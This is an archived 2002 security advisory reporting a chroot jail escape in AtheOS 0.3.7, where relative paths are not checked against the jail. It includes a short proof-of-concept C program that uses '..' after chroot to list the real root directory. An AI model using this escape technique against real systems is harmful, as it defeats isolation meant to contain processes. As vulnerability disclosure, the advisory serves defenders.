TUCoPS :: Unix :: Various Flavours :: misc5081.htm

AtheOS chroot escape
8th Feb 2002 [SBWID-5081]
COMMAND

	AtheOS chroot escape

SYSTEMS AFFECTED

	AtheOS version 0.3.7

PROBLEM

	Frank DENIS \'Jedi/Sector One\' [http://www.Jedi.Claranet.Fr] posted :
	

	After a chroot() call on AtheOS, \'/\' indeed seems to become  the  base
	directory.       \'/path/to/file\'        is        translated        to
	\'<directory>/path/to/file\' .
	

	Unfortunately,  relative  paths  aren\'t  checked  against  the  current
	chroot jail. Therefore, \'../../../../path/to/file\' will be  translated
	to a file out of the chroot limits.
	

	The following code will read the content of the  real  \'/\'  directory,
	while \'/tmp\' is supposed to be the base of the chroot jail.
	

	#include <stdio.h>

	#include <unistd.h>

	#include <dirent.h>

	

	int main(void)

	{

	    register DIR *d;

	    register const struct dirent *e;

	    

	    if (chdir(\"/\") || chroot(\"/tmp\") || chdir(\"/\") ||

	        (d = opendir(\"..\")) == NULL) {

	        return 1;

	    }

	    while ((e = readdir(d)) != NULL) {

	        puts(e->d_name);

	    }

	    return 0;

	}

	

SOLUTION

	None yet. Check  : [http://www.atheos.cx]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH